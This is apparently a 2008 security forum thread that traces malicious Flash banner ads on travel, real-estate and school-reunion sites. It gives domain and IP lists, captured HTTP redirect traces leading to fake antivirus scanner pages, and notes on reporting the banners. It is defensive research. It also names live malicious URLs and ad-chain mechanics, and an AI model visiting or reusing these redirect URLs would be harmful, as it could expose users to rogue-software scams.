  287. Wintrygghet.com
  288. Wirusumuryokuka.com
  289. Yoursystemguard.com
  290. Zebraantivirus.com
<h4>
B2adz.com - 76.74.249.30
</h4>
Server Type: lighttpd/1.4.13
IP Location - Texas - San Antonio - Serverbeach

shares the same IP as waytotheprofit.com, blessedads.com, prevedmarketing.com, luckyadsols.com ....

<h4>
archive.easydownloadsoft.com - 66.244.254.201 & 66.244.254.239
</h4>
66.244.254.201
  1. archive.easydownloadsoft.com A
  2. bsa.safetydownload.com CNAME
  3. content.onerateld.com A
  4. sec.storageguardsoft.com A
  5. software.protectdownloads.com CNAME
66.244.254.239
  1. archive.easydownloadsoft.com A
  2. box239.yyz1.setupahost.net PTR A
  3. bsa.safetydownload.com CNAME
  4. content.onerateld.com A
  5. sec.storageguardsoft.com A
  6. software.protectdownloads.com CNAME
<h4>
Miscellaneous IP blocks
</h4>
safe.sysdepannage.com - 67.55.81.167
sysdepannage.com - 67.55.81.200
http://www.robtex.com/cnet/67.55.81.html

pixel.safetydownload.com - 85.12.60.20
pixel1.onerateld.com - 85.12.60.20
enregistrer.menacecontrole.com - 85.12.60.60
http://www.robtex.com/cnet/85.12.60.html

advancedcleaner.com - 85.17.4.103
inscan.fr.advancedcleaner.com - 85.17.4.104
gregistre.menacecontrole.com - 85.17.4.104
reglog.sysdepannage.com - 85.17.4.104
http://www.robtex.com/cnet/85.17.4.html

trial.advancedcleaner.com - 85.17.4.152
http://www.robtex.com/dns/trial.advancedcleaner.com.html

sale.antispywaremaster.com - 85.234.134.125
http://www.robtex.com/dns/sale.antispywaremaster.com.html

antispywaremaster.com - 87.117.252.11
http://www.robtex.com/ip/87.117.252.11.html

uptrial.sysdepannage.com - 87.117.255.35
http://www.robtex.com/dns/uptrial.sysdepannage.com.html
http://www.robtex.com/cnet/87.117.255.html

gratuit.restauration.menacecontrole.com - 89.18.181.22
http://www.robtex.com/dns/gratuit.restaura...ntrole.com.html

vente.menacecontrole.com - 89.18.181.38
menacecontrole.com - 89.18.181.100
http://www.robtex.com/cnet/89.18.181.html
Kimberly
<h4>
www.voyages-sncf.com
</h4>
A malicious advertising banner was reported on www.voyages-sncf.com yesterday evening here.

Banner.

medias.voyages-sncf.com/0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf
The malicious SWF is hosted on their proper servers. Yourmusic banners have been seen on other websites in the past.

Redirects.

station-appraisals.com/c/index.php?id=TGVwWjgwV29vcWdVVWlxRk8wNDRoPTEyMDQ2NTE3MjcmcG56Y252dGE9cWJjYmm7NkiZmdm95bAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=dopossibly
Screenshots in situ.

IPB Image
IPB Image
Since I was using my English VM, I got redirected to scanner2.malware-scan.com

IPB Image
Once the page loaded, I also got an alert to instal Spy-shredder. Let's call that 2 for the same "price".

IPB Image
Leaving the site, I still got prompted to download the software.

IPB Image
Closing the window, yielded in a download window.

IPB Image
Trace log with refers.
CODE
GET /0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf HTTP/1.1
Accept: */*
Referer: http://www.voyages-sncf.com/daily/deals/vsc/promotion_train/train_paris_turin.html?rfrr=Homepage_ColonneC_D%C3%A9couvrez%20le%20Pi%C3%A9mont
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: medias.voyages-sncf.com
Connection: Keep-Alive
Cookie: MC1=GUID=C073D9D07FFB49F59CD12C6596E33C84; RMID=56cae9fe47de9f80; RMFD=011JbIQHO101AHv|O101B4O; RMFW=011JbIQH7101Am5|7101BRs; s_cc=true; s_sq=voyagessncfcomprod%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.voyages-sncf.com/daily/deals/vsc/promotion_train/train_paris_turin.html%25253Frfrr%25253DHomepage_Col%2526ot%253DA%2526oi%253D1027; s_vi=[CS]v1|47DE9F9200000CB6-A140C6100003176[CE]

HTTP/1.1 200 OK
Date: Mon, 17 Mar 2008 16:45:13 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Last-Modified: Wed, 05 Mar 2008 17:50:12 GMT
ETag: "747e6-34ca-47cedd54"
Accept-Ranges: bytes
Content-Length: 13514
Connection: close
Content-Type: application/x-shockwave-flash

The infamous crossdomain.xml was the next link.
CODE
GET /crossdomain.xml HTTP/1.1
Accept: */*
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: station-appraisals.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Mon, 17 Mar 2008 17:51:58 GMT
Content-Type: text/xml
Connection: close
Content-Length: 99
Last-Modified: Mon, 17 Dec 2007 12:24:07 GMT
Accept-Ranges: bytes
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

Here we clearly see medias.voyages-sncf.com/0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf in the HTTP referer header.
CODE
GET /c/index.php?id=TGVwWjgwV29vcWdVVWlxRk8wNDRoPTEyMDQ2NTE3MjcmcG56Y252dGE9cWJjYmm7NkiZmdm95bAYNkiDgNmYNkiDgNm HTTP/1.1
Accept: */*
Referer: http://medias.voyages-sncf.com/0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: station-appraisals.com
Connection: Keep-Alive

Next location is waytotheprofit.com with the campaign name as a parameter. The web page contains a redirect to prevedmarketing.com.
CODE
GET /?cmpid=dopossibly HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: waytotheprofit.com
Connection: Keep-Alive

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.0-8+etch10
Set-Cookie: gI=YTo1OntzOjEyOiJjb3VudHJ5X2NvZGUiO3M6MjoiRlIiO3M6NzoiY291bnRyeSI7czo2OiJmcmFuY2UiO3M6NToic3RhdGUiO3M6MjQ6InByb3ZlbmNlLWFscGVzLWNvdGVkJ3p1ciI7czo0OiJjaXR5IjtzOjQ6Im5pY2UiO3M6MTE6ImNvdW50cnlfYWJyIjtzOjM6IkZSQSI7fQ%3D%3D; expires=Tue, 17-Mar-2009 16:45:19 GMT; path=/; domain=.adnetserver.com
Set-Cookie: gI=YTo1OntzOjEyOiJjb3VudHJ5X2NvZGUiO3M6MjoiRlIiO3M6NzoiY291bnRyeSI7czo2OiJmcmFuY2UiO3M6NToic3RhdGUiO3M6MjQ6InByb3ZlbmNlLWFscGVzLWNvdGVkJ3p1ciI7czo0OiJjaXR5IjtzOjQ6Im5pY2UiO3M6MTE6ImNvdW50cnlfYWJyIjtzOjM6IkZSQSI7fQ%3D%3D; expires=Tue, 17-Mar-2009 16:45:19 GMT; path=/; domain=.adnetserver.com
Location: http://prevedmarketing.com/?tmn=mwatmp&aid=dopossibly&lid=&ax=1&ed=2&mt_info=5694_6106_2358
Content-type: text/html
Content-Length: 0
Date: Mon, 17 Mar 2008 16:45:19 GMT
Server: lighttpd/1.4.13

From prevedmarketing.com we are redirected to scanner2.malware-scan.com
CODE
GET /?tmn=mwatmp&aid=dopossibly&lid=&ax=1&ed=2&mt_info=5694_6106_2358 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: prevedmarketing.com
Connection: Keep-Alive

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.0-8+etch10
Set-Cookie: gI=YTo1OntzOjEyOiJjb3VudHJ5X2NvZGUiO3M6MjoiRlIiO3M6NzoiY291bnRyeSI7czo2OiJmcmFuY2UiO3M6NToic3RhdGUiO3M6MjQ6InByb3ZlbmNlLWFscGVzLWNvdGVkJ3p1ciI7czo0OiJjaXR5IjtzOjQ6Im5pY2UiO3M6MTE6ImNvdW50cnlfYWJyIjtzOjM6IkZSQSI7fQ%3D%3D; expires=Tue, 17-Mar-2009 16:45:23 GMT; path=/; domain=.adnetserver.com
Set-Cookie: gI=YTo1OntzOjEyOiJjb3VudHJ5X2NvZGUiO3M6MjoiRlIiO3M6NzoiY291bnRyeSI7czo2OiJmcmFuY2UiO3M6NToic3RhdGUiO3M6MjQ6InByb3ZlbmNlLWFscGVzLWNvdGVkJ3p1ciI7czo0OiJjaXR5IjtzOjQ6Im5pY2UiO3M6MTE6ImNvdW50cnlfYWJyIjtzOjM6IkZSQSI7fQ%3D%3D; expires=Tue, 17-Mar-2009 16:45:23 GMT; path=/; domain=.adnetserver.com
Location: http://scanner2.malware-scan.com/14_swp/?tmn=null&aid=dopossibly_ma14s_mb1t&lid=&affid=&ax=1&ed=2&mt_info=5694_6106_2358:3958_0_15358
Content-type: text/html
Content-Length: 0
Date: Mon, 17 Mar 2008 16:45:23 GMT
Server: lighttpd/1.4.13

Details will be forwarded to www.voyages-sncf.com in the next minutes.
Kimberly
Some interesting information thanks to MAD.

On Mar 17 2008, we found the banner below.
medias.voyages-sncf.com/0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf
There are 2 other yourmusic banners on the loose which have of course the same redirects.

realmedia.pap.fr/0/VSC/yourmusic-bmgdirect-mar08-ban/yourmusic_468x60.swf
stream.expedia.fr/0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf
______________________________

The interesting part is the IP where all these banners are hosted.

212.113.31.48

canonical name eur56deliv.247realmedia.com.
aliases stream.expedia.fr
oas000575.247realmedia.com

canonical name eur56deliv.247realmedia.com.
aliases medias.voyages-sncf.com
oas000551.247realmedia.com

canonical name eur56deliv.247realmedia.com.
aliases realmedia.pap.fr
oas000459.247realmedia.com

Robtex information.

212.113.31.32-212.113.31.63 REALMEDIA-UK Real Media London

hostnames sharing ip with a-records.
  • eur56deliv.247realmedia.com
hostnames sharing ip indirectly via cnames.
  • ads-nc.rmuk.co.uk
  • ads-secure.rmuk.co.uk
  • medias.voyages-sncf.com
  • multi1.rmuk.co.uk
  • oas-eu.247realmedia.com
  • pubca.cvf.fr
______________________________

Seeing a banner being hosted at stream.expedia.fr, it's fairly reasonable to presume that visitors of Expedia.fr will be hit by the advertisement. Expedia.com was already the victim of a malicious banner during the period of Jan 29 2008.

I'll try to get in touch with RealMedia to get them removed. The SNCF hasn't replied to any of my requests either.
______________________________

Update 6:30 AM

www.pap.fr - a french real estate website - does get their banners from realmedia.pap.fr. An english version of the website is also available. With around 7.128.693 visits / month, a lot of people could be the victim of redirects when visiting the website.

Sandi has alerted her contacts and blogged the incidents too in meanwhile.
http://msmvps.com/blogs/spywaresucks/archi...21/1549124.aspx
Kimberly
I've just checked back on the 3 banners. From what I can see they have been neutralized about 2 hours ago. Internet Explorer is showing a blank page and the file is only 25 bytes in size. Only the header remains. Probably done on purpose in order not to break the links on the websites.

IPB Image
Kimberly
<h4>
www.classmates.com
</h4>
A very bad weekend for classmates.com, 3 active banners were discovered on their site. The following URL's are involved:

iexplorer-security.org/?id=624400105
fastwebway.com/soft.php?aid=011807&d=1&product=XPA
xponlinescanner.com/2008/1/freescan.php?aid=77011807
The full story can be read here. The information about Gemini Interactive is very interesting but I got curious about another domain because of something Sandi said:

QUOTE
I think I know, now, why I have received several complaints about malicious banner advertisements in association with Juno.

The banners are hosted on nztv.prod.untd.com and nztv.prod.untd.com is hosted on a Juno Block.

<h4>
nztv.prod.untd.com - 64.136.44.21
</h4>
64.136.0.0-64.136.63.255 JUNO-BLK
64.136.44.0/22 UOL DCA Block
13446 UNSPECIFIED Primary AS for United Online

People who know me a little bit know that I love to dig up stuff. laugh.gif

Let's do a Google search on nztv.prod.untd.com and see if we can find something. Page 2 on Google Search caught my attention because of the word Getfreecar in a flash link. Back in January we did indeed find gnida.swf on getfreecar.com. See Post#9.
IPB Image
Will we be lucky or not ... yep very lucky. The advertisement is still active as seen below.
IPB Image
It looks like the page is not very will written because we see a part of the website's code. It also reveals us that these redirects have at least being going on since November 2006 - see the mention 728x90_Getfreecar_Nov06.html.html. The banner is malicious; the redirects seen in Ethereal did prove it. The link keeps bouncing on getfreecar.com and almost "kills" your internet connection. The website only shows a blank page with stats=251643485. I fear this represents the number of people being redirected.
IPB Image
CODE
GET /crossdomain.xml HTTP/1.1
Accept: */*
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
If-Modified-Since: Mon, 17 Dec 2007 12:31:49 GMT
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: getfreecar.com
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Server: nginx/0.4.13
Date: Sun, 23 Mar 2008 17:28:20 GMT
Last-Modified: Mon, 17 Dec 2007 12:31:49 GMT
Connection: keep-alive

GET /stats.php?campaign=unlu3001&u=1163187596333 HTTP/1.1
Accept: */*
Referer: http://nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_Getfreecar_LBLINT_2_8671/gfc_728x90.swf?clickTAG=http://cyclops.prod.untd.com/Real
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: getfreecar.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Sun, 23 Mar 2008 17:28:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.0-8+etch10
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 23 Mar 2008 17:28:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache

f
stats=251643485
0

Banner.
nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_Getfreecar_LBLINT_2_8671/gfc_728x90.swf
Campaign.
getfreecar.com/stats.php?campaign=unlu3001&u=1163187596333
______________________________

They made a "revised" version of the advertisement on 6 March 2007.
IPB Image
I wanted to have a look at the banner and the scripts, so I opened the SWF file in Flash Decompiler Trillix. During playback, Flash Decompiler Trillix wanted to access Internet.
IPB Image
Another malicious banner as seen below ... Note the referer - Referer: file://C|\Documents and Settings\KLY\Desktop\getfreecar728x90_REVISED_07052006_unprotected.swf - it's really the file on my desktop.
IPB Image
CODE
GET /stats.php?campaign=union&u=1152354215430 HTTP/1.1
Accept: */*
Referer: file://C|\Documents and Settings\KLY\Desktop\getfreecar728x90_REVISED_07052006_unprotected.swf
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: getfreecar.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Sun, 23 Mar 2008 17:26:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.0-8+etch7
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 23 Mar 2008 17:26:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache

f
stats=139874997
0

I opened many SWF files with different tools and this is the first time I did encounter this behavior.

Banner.
nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_GetFreeCar_LBLINT_6_8671/getfreecar728x90_REVISED_07052006.swf
Campaign.
getfreecar.com/stats.php?campaign=union&u=1152354215430
IPB Image

Maybe it's time for RealMedia to perform some "spring cleaning", what do you think ? diablo.gif
Kimberly
Classmates, Expedia, voyages-sncf ... to name only a few prefer to "manage" their adverts themselves using the RealMedia software. I don't have a problem with that unless I get a reply like below when contacting them to REPORT a banner.

From voyages-sncf ....

QUOTE
Madame, Monsieur,

Nous avons bien reçu votre message dans lequel vous nous faites part de vos remarques relatives au téléchargement gratuit du logiciel « erreur chasseur».
Nous vous invitons à ne surtout pas donner suite à cette alerte.
En effet, nous vous informons que ce message est envoyé à votre navigateur internet via les publicités diffusées sur internet. il est donc nécessaire pour s'en prémunir d'avoir un anti virus mis à jour.
Nous vous recommandons de rester vigilant pendant votre navigation sur internet face à des fenêtres inconnues proposant des services payants.
Jamais voyages-sncf.com ne vous proposera de télécharger ce genre de logiciel.
Nous restons à votre disposition pour toute question complémentaire.

Google translation - I even don't wanna waste time on it myself, quite understandable isn't it ....

QUOTE
Madam,

We have received your message in which you give your comments to download free software error "fighter".
We encourage you not to be in response to this alert.
Indeed, we inform you that this message is sent to your Internet browser via advertising on the Internet. It is therefore necessary to withstand them to have an anti virus updated.
We recommend that you remain vigilant during your internet browsing windows facing unknowns offering paid services.
Never voyages-sncf.com do you propose to download this software.
We remain at your disposal for any question.

Jeez, are we guys / gals lucky that RealMedia took care of everything because (1) their reply is a bit late and (2) they didn't fully understand the problem did they !!!!

I'm so angry right now that I have only 3 words to say: Block Flash content.

Ref : Can I protect myself from these adverts?
Kimberly
IPB Image

Banner.
r2d2adverising.com/edges/creatives/Dottunes_728x90/flash/579e957e1139c5df793c0ec5e29b8a36
Campaign.
officialstat.com/crossdomain.xml

officialstat.com/c/index.php?id=MW0xRjhVWHNzWUp4MTNIc0tqNlhoPTEyMDQxOTgxNDImcG56Y252dGE9aGm7NkiZym7NkiZ3JlYXm7NkiZnbAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=useternity&adid=intl
<h4>
Notes
</h4>
Seeing that the banner was hosted at r2d2adverising.com, I got curious how they served this one. It all starts with an iframe.

CODE
<html><head><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE"><script>setInterval("location.reload()",60000*4);</script><base target=_blank><style>body{height:100%;margin:0;padding:0;}</style></head><body bgcolor=#888888><center><iframe id='23456821' name='23456821' src='http://linktarget.com/f.php?n=23456821&what=zone:37' framespacing='0' frameborder='no' scrolling='no' width='468' height='60'><a href='http://linktarget.com/c.php?n=23456821' target='_blank'><img src='http://linktarget.com/v.php?what=zone:48&n=23456821' border='0'></a></iframe></center></body></html>

Starting point.
linktarget.com/f.php?n=23456821&what=zone:37
CODE
GET /cgi-bin/cpm/nlad.cgi?uid=mediatarget&cid=gaming&ord=98355464 HTTP/1.1
Accept: */*
Referer: http://linktarget.com/f.php?n=23456821&what=zone:37
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: m.rmbclick.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 05:33:40 GMT
Server: Apache/1.3.19 (Unix) mod_perl/1.25
Set-Cookie: RMBClick_mediatarget_NetworkURL=; domain=; path=/; expires=Monday, 25-Mar-2018 05:33:40 GMT;
Expires: now
Cache-Control: post-check=0,pre-check=0, max-age=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-javascript

188
document.write('<IFRAME SRC="http://m.rmbclick.com/creatives/ecas/wen2.html" name="max" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no"></IFRAME>');
document.write('<IFRAME SRC="http://39m.net/creatives/max/ad2.html" name="buy" width="0" height="0" frameborder="no" border="0" MARGGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no"></IFRAME>');
0

We are only interested by m.rmbclick.com/creatives/ecas/wen2.html.

CODE
GET /serving/showbanner_net.php?nid=1017&chad=1&cs=&adtype=1&sid=13&pid=13&uid=24534842283589 ......
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://m.rmbclick.com/creatives/ecas/wen2.html
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: serving.rmbclick.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 04:06:04 GMT
Server: Apache/2.2.4 (Fedora)
X-Powered-By: PHP/5.2.2
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: roi=a%3A1%3A%7Bi%3A0%3Ba%3A5%3A%7Bs%3A3%3A%22cid%22%3Bs%3A2%3A%2268%22%3Bs%3A6%3A%22siteid%22%3Bs%3A2%3A%2213%22%3Bs%3A3%3A%22kid%22%3Bs%3A3%3A%22858%22%3Bs%3A7%3A%22pub_nid%22%3BN%3Bs%3A7%3A%22ads_nid%22%3BN%3B%7D%7D; expires=Sat, 26-Apr-2008 04:06:04 GMT; path=/; domain=.rmbclick
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

f6
<html><head></head>
<body topmargin='0' leftmargin='0'><iframe src="http://creative.clicksor.com/network_1017/68/c784754399.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO width="728" height="90"></iframe></body> </html>
0

CODE
GET /network_1017/68/c784754399.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://serving.rmbclick.com/serving/showbanner_net.php?nid=1017&chad=1&cs=&adtype=1&sid=13&pid=13&uid=24534842283589 .......
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: creative.clicksor.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 04:06:05 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Fri, 14 Mar 2008 00:46:04 GMT
ETag: "e44e73-179-feaf4b00"
Accept-Ranges: bytes
Content-Length: 377
Connection: close
Content-Type: text/html; charset=UTF-8

<html><head><title>AD</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head><body topmargin="0" leftmargin="0">
........<iframe width="728" height="90" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://m.rmbclick.com/cgi-bin/cpm/ultra-ad.cgi?uid=dottunes_swf&cid=dottunes&type=image"></IFRAME>
........</body></html>

CODE
GET /cgi-bin/cpm/ultra-ad.cgi?uid=dottunes_swf&cid=dottunes&type=image HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://creative.clicksor.com/network_1017/68/c784754399.html
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: m.rmbclick.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Thu, 27 Mar 2008 05:33:47 GMT
Server: Apache/1.3.19 (Unix) mod_perl/1.25
Set-Cookie: RMBClick_dottunes_swf_NetworkURL=; domain=; path=/; expires=Monday, 25-Mar-2018 05:33:47 GMT;
Expires: now
Cache-Control: post-check=0,pre-check=0, max-age=0
Pragma: no-cache
Location: http://r2d2adverising.com/edges/banner_show.php?b_name=Dottunes_728x90
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain

fa
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://r2d2adverising.com/edges/banner_show.php?b_name=Dottunes_728x90">here</A>.<P>
</BODY></HTML>
0

CODE
GET /edges/banner_show.php?b_name=Dottunes_728x90 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://creative.clicksor.com/network_1017/68/c784754399.html
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Host: r2d2adverising.com

Here I'm leaving a part out, I've attached the complete text to the topic because it's way too long. Below are just a few snipits.

CODE
swfobject.embedSWF("creatives/Dottunes_728x90/flash/579e957e1139c5df793c0ec5e29b8a36", "alternative_content_2101", "728", "90", "6.0.0",
false, flashvars, params, attributes);


GET /edges/libs/swfobject.js HTTP/1.1
Accept: */*
Referer: http://r2d2adverising.com/edges/banner_show.php?b_name=Dottunes_728x90
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: r2d2adverising.com

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: "3665875932862002964"
Accept-Ranges: bytes
Last-Modified: Tue, 22 Jan 2008 11:57:21 GMT
Content-Length: 10995
Date: Thu, 27 Mar 2008 04:06:09 GMT
Server: lighttpd/1.4.13

/*.SWFObject v2.0 rc1 <http://code.google.com/p/swfobject/>
.Copyright (c) 2007 Geoff Stearns, Michael Williams, and Bobby van der Sluis
.This software is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/

And of course the SWF file ...

CODE
GET /edges/creatives/Dottunes_728x90/flash/579e957e1139c5df793c0ec5e29b8a36 HTTP/1.1
Accept: */*
Referer: http://r2d2adverising.com/edges/banner_show.php?b_name=Dottunes_728x90
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: r2d2adverising.com

CODE
GET /c/index.php?id=MW0xRjhVWHNzWUp4MTNIc0tqNlhoPTEyMDQxOTgxNDImcG56Y252dGE9aGm7NkiZym7NkiZ3JlYXm7NkiZnbAYNkiDgNmYNkiDgNm HTTP/1.1
Accept: */*
Referer: http://r2d2adverising.com/edges/creatives/Dottunes_728x90/flash/579e957e1139c5df793c0ec5e29b8a36
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: officialstat.com
Connection: Keep-Alive

I will check out the domains we saw here later on. creative.clicksor.com retains again my attention because I stumbled on them in another advertising problem here.

Update 28 March 01:30 AM

r2d2adverising.com - 190.15.73.254
http://www.robtex.com/dns/r2d2adverising.com.html

linktarget.com - 83.149.101.2
83.149.101.0-83.149.101.255 LEASEWEB LeaseWeb P.O. Box 93054 1090BB AMSTERDAM Netherlands

m.rmbclick.com - 202.76.88.129
202.76.64.0-202.76.127.255 CPCNET-HK CPCNet Hong Kong Ltd. 20/F, Lincoln House, Taikoo Place, 979 King's

rmbclick.com A 202.76.88.129
NS dns1.rmbclick.com 202.76.88.129
NS dns2.rmbclick.com 202.76.88.130
MX mail.rmbclick.com 202.76.88.130

serving.rmbclick.com - 66.48.81.213
66.48.0.0-66.48.255.255 UUNETCA8-A

serving.adsrevenue.clicksor.net - 66.48.81.209
clicksor.net - 66.48.81.202

creative.clicksor.com - 66.48.78.212
clicksor.com - 66.48.78.246
Kimberly
Social Engineering. ohmy.gif

I don't often comment articles but honestly, I can't even call that social engineering ...

Even a 14 year old kid or a n00b would notice some weird things. If the guy / gal in your department falls for THIS ... lol time to fire him / her ... unless you go after the $$$ of course ....

Website Title: ForceUp - Online advertisement agency
ICANN Registrar: TUCOWS INC.
IP Address: 84.243.252.88
Created: 2005-09-09
Expires: 2008-09-09
Server Type: nginx/0.4.13
Whois History: 44 records have been archived since 2005-09-21.
Dedicated Hosting: forceup.com is hosted on a dedicated server.

Domain servers in listed order:
NS2.FORCEUP.COM 190.15.73.252
NS1.FORCEUP.COM 190.15.73.251

www.forceup.com/contactus.html
IPB Image
Website Title: Opensolutions - Functional Expertise, Cutting Edge Technologies, Global Vision and Rapid Growth....
ICANN Registrar: TUCOWS INC.
Created: 2004-02-17
Expires: 2009-02-17
Server Type: lighttpd/1.4.13
IP Address: 190.15.73.254
Whois History: 38 records have been archived since 2004-05-25
Reverse IP: 69 other sites hosted on this server.

Domain servers in listed order:
NS1.OPENSOLS.COM 190.15.73.251
NS2.OPENSOLS.COM 190.15.73.252

www.opensols.com/new_tpls/Contactus.html

IPB Image
Quite similar ain't they ...
______________________________

www.opensols.com/new_tpls/clients.htm
IPB Image
Whoops I did it again ... roflmao.gif

IPB Image
Maybe my internet connection got hijacked ??? wacko.gif
Kimberly
<h4>
Another goodie
</h4>
IPB Image
This is probably the banner that did hit NHL.com back in November 2007. The advertising link is still active.

Banner.
m1.2mdn.net/1612895/NHL_MediaMan_728x90_flash.swf
Campaign.
adtraff.com/statsa.php?u=23423424&campaign=pushmama
The redirect still partially works as seen below.

CODE
GET /statsa.php?u=23423424&campaign=pushmama HTTP/1.1
Accept: */*
Referer: http://m1.2mdn.net/1612895/NHL_MediaMan_728x90_flash.swf
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
